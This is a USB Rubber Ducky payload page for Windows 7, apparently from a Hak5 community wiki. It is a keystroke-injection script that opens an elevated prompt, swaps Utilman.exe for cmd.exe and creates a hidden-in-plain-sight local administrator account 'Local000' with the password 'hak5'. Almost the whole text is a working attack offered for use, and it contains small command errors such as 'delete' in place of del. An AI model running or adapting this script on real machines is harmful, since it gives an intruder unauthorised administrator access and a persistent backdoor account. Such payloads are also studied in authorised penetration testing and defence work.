wiki-rubber-ducky-usb/Payload---utilman-exploit.rdoc

Author: Xcellerator (props to Jay Kruer's Fork Bomb script for the UAC bypass technique!)
Duckencoder: 1.0
Target: Windows 7
Description: Uses the Utilman.exe Exploit to create a new local administrator account “Local000” with the password “hak5”.
 REM Author: Xcellerator
 REM Description: Utilman Exploiter to create a new Admin Account
 REM The new account will be called "Local000".
 GUI
 DELAY 50
 STRING cmd
 MENU
 STRING a
 ENTER
 LEFT
 ENTER
 DELAY 200
 STRING takeown /f "%systemroot%\System32\Utilman.exe"
 ENTER
 DELAY 50
 STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T
 ENTER
 DELAY 50
 STRING cd %systemroot%\System32
 ENTER
 DELAY 50
 STRING mkdir util
 ENTER
 STRING xcopy cmd.exe util\
 ENTER
 DELAY 50
 STRING ren Utilman.exe Utilman.exe.bak
 ENTER
 STRING cd util
 ENTER
 DELAY 50
 STRING ren cmd.exe Utilman.exe
 ENTER
 DELAY 50
 STRING cd ..
 ENTER
 DELAY 50
 STRING xcopy util/Utilman.exe \
 ENTER
 DELAY 50
 STRING rmdir /s /q util
 ENTER
 DELAY 50
 STRING exit
 ENTER
 DELAY 50
 GUI u
 STRING net user Local000 /add
 ENTER
 DELAY 50
 STRING net localgroup administrators Local000 /add
 ENTER
 DELAY 50
 STRING exit
 ENTER
 DELAY 50
 GUI r
 STRING cmd
 ENTER
 DELAY 50
 STRING cd "%systemroot%\System32"
 ENTER
 DELAY 50
 STRING delete Utilman.exe
 ENTER
 DELAY 50
 STRING y
 ENTER
 DELAY 50
 STRING ren Utilman.exe.bak Utilman.exe
 ENTER
 DELAY 50
 STRING exit
 ENTER
 GUI
 STRING cmd
 MENU
 STRING a
 ENTER
 DELAY 50
 LEFT
 ENTER
 DELAY 200
 STRING net user Local000 *
 ENTER
 STRING hak5
 ENTER
 STRING hak5
 ENTER
 STRING exit
 ENTER